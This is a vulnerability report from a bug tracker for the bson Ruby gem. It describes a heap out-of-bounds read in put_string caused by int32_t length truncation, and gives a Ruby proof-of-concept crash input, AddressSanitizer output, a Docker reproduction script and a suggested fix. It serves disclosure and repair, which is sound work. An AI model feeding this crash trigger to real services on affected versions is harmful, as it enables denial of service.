[bson-ruby] Heap Buffer Overflow in put_string

    • Type: Bug
    • Resolution: Fixed
    • Priority: Unknown
    • bson-5.2.1
    • Affects Version/s: None
    • Component/s: BSON
    • Fully Compatible
    • Ruby Drivers
    • Not Needed

      Summary

      BSON::ByteBuffer#put_string stores the Ruby string length in an int32_t before UTF-8 validation. For a string of 2**31 bytes the stored length wraps to a negative value, which is then converted to a huge size_t and drives the native UTF-8 validator past the end of the heap allocation.

      Affected version

      • Software: bson gem
      • Version: 5.2.0
      • Commit: dcae7f483a262305159ae8b2711cf359f7d9af65

      Details

      The native string encoder stores the result of RSTRING_LEN in an int32_t variable (length), even though Ruby strings can be larger than INT32_MAX bytes.

      ext/bson/write.c:209

      static VALUE pvt_bson_encode_to_utf8(VALUE string) {
        VALUE existing_encoding_name;
        VALUE encoding;
        VALUE utf8_string;
        const char *str;
        int32_t length;
      ...
          str = RSTRING_PTR(utf8_string);
          length = RSTRING_LEN(utf8_string);
      
          rb_bson_utf8_validate(str, length, true, "String");
      

      RSTRING_LEN returns long, which is 64 bits wide on LP64 platforms such as 64-bit Linux and macOS. Assigning it to int32_t silently truncates the length of any string of 2 GiB (2**31 bytes) or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:

      ext/bson/libbson-utf8.c:105

      void
      rb_bson_utf8_validate (const char *utf8,
                             size_t utf8_len,
                             bool allow_null,
                             const char *data_type)
      {
      ...
         for (i = 0; i < utf8_len; i += seq_length) {
            _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);
      

      The implicit conversion of a negative int32_t to size_t wraps to a value near UINT64_MAX (2**64 - 2**31 for INT32_MIN on a 64-bit host). The loop therefore keeps running past the end of the string, and the byte load at the top of _bson_utf8_get_sequence reads out of bounds:

      ext/bson/libbson-utf8.c:40

         unsigned char c = *(const unsigned char *) utf8;
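
The two conversions described above can be modeled with plain integer arithmetic. The sketch below is illustrative Ruby, not code from the gem: the helper names `to_int32` and `to_size_t` are hypothetical, and it assumes a 64-bit `size_t` and the usual two's complement wraparound on narrowing.

```ruby
# Model of the C conversions on a 64-bit host (assumption: two's complement
# wraparound when a wider value is stored in a narrower signed type).

# Narrow an arbitrary integer to int32_t, keeping only the low 32 bits.
def to_int32(n)
  ((n + 2**31) % 2**32) - 2**31
end

# Convert a (possibly negative) integer to a 64-bit size_t.
def to_size_t(n)
  n % 2**64
end

length   = to_int32(2**31)    # value stored by `length = RSTRING_LEN(...)`
utf8_len = to_size_t(length)  # value seen by rb_bson_utf8_validate

puts length    # -2147483648
puts utf8_len  # 18446744071562067968
```

Under the same model, a length whose low 32 bits have the top bit clear, such as 2**32 + 5, would truncate to a small positive value (5) rather than a negative one.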
      

      Proof of concept

      require "bson"
      
      buffer = BSON::ByteBuffer.new
      huge = "A" * (2**31)
      warn huge.bytesize
      buffer.put_string(huge)
      

      AddressSanitizer output

      ==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
      READ of size 1 at 0xffff75bfe801 thread T0
          #0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
          #1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
          #2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
          #3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243
      
      0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
      SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40
               in _bson_utf8_get_sequence
      

      Reproduction

      On a machine with Docker, run:

      mkdir -p dfvuln-772-bson-put-string-oob
      cd dfvuln-772-bson-put-string-oob
      cat > poc_put_string_oob.rb <<'RUBY'
      require "bson"
      
      buffer = BSON::ByteBuffer.new
      huge = "A" * (2**31)
      warn huge.bytesize
      buffer.put_string(huge)
      RUBY
      
      docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc '
      set -eux
      apt-get update -qq
      apt-get install -y -qq git build-essential pkg-config >/dev/null
      git clone --depth=1 https://github.com/mongodb/bson-ruby.git src
      cd src
      git rev-parse HEAD | tee /work/commit.txt
      bundle config set path vendor/bundle
      bundle install
      cd ext/bson
      make distclean >/dev/null 2>&1 || true
      ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \
                      --with-ldflags="-fsanitize=address"
      make -j"$(nproc)"
      cd ../..
      cp ext/bson/bson_native.so lib/
      ASAN_LIB=$(gcc -print-file-name=libasan.so)
      set +e
      LD_PRELOAD="$ASAN_LIB" \
        ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \
        ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log
      status=${PIPESTATUS[0]}
      set -e
      test "$status" -ne 0
      grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log
      '
      

      This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log.

      Independent confirmation

      The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.

      ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: lines 214 and 241 (inside pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string respectively). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent – no compiler warning, no runtime check. Passing the resulting negative value to rb_bson_utf8_validate (which takes size_t) is the direct cause of the out-of-bounds read described above.

      Severity assessment

      Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.
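
      For callers that use the gem directly on an affected version, a size check in front of put_string keeps oversized strings away from the native path. A minimal sketch, assuming the caller controls the call site: `checked_put_string` and its `limit:` parameter are hypothetical names, not part of the gem, and the default limit assumes the BSON length prefix also counts the trailing NUL byte.

```ruby
# Hypothetical wrapper: reject oversized strings before the native call.
# `buffer` is anything that responds to #put_string (e.g. BSON::ByteBuffer).
# The default limit is the largest byte count that, plus the trailing NUL,
# still fits in a signed 32-bit length prefix.
def checked_put_string(buffer, string, limit: 2**31 - 2)
  size = string.bytesize
  if size > limit
    raise ArgumentError, "string of #{size} bytes exceeds limit of #{limit}"
  end
  buffer.put_string(string)
end
```

      The check uses the byte size of the string in its current encoding. A string that is not already UTF-8 can grow when transcoded, so a stricter limit may be appropriate for such input.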

      Suggested fix

      In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long (matching RSTRING_LEN's return type). Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix. The prefix is an int32_t that counts the string bytes plus the trailing NUL, so a string of INT32_MAX bytes or more cannot be encoded as valid BSON regardless:

      long length = RSTRING_LEN(utf8_string);
      /* The BSON prefix stores length + 1 (trailing NUL), so length must stay below INT32_MAX. */
      if (length >= INT32_MAX) {
          rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length);
      }
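
The bound comes from the BSON string layout: a little-endian int32 length prefix, the UTF-8 bytes, and a terminating NUL, where the prefix counts the bytes plus the terminator. The Ruby sketch below illustrates that layout only; the helper name `encode_bson_string` is hypothetical and this is not the gem's encoder.

```ruby
# Illustrative encoder for a BSON string value: an int32 little-endian prefix
# holding (byte count + 1), then the bytes, then a NUL terminator.
def encode_bson_string(string)
  bytes  = string.encode(Encoding::UTF_8).b
  prefix = bytes.bytesize + 1  # +1 for the trailing NUL
  raise ArgumentError, "string too long for BSON" if prefix > 2**31 - 1
  [prefix].pack("l<") + bytes + "\x00".b
end

p encode_bson_string("hi").bytes  # [3, 0, 0, 0, 104, 105, 0]
```

With this layout the largest payload that can be represented is INT32_MAX - 1 bytes, since the prefix itself must not exceed INT32_MAX.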
      

            Assignee:
            Jamis Buck
            Reporter:
            Jamis Buck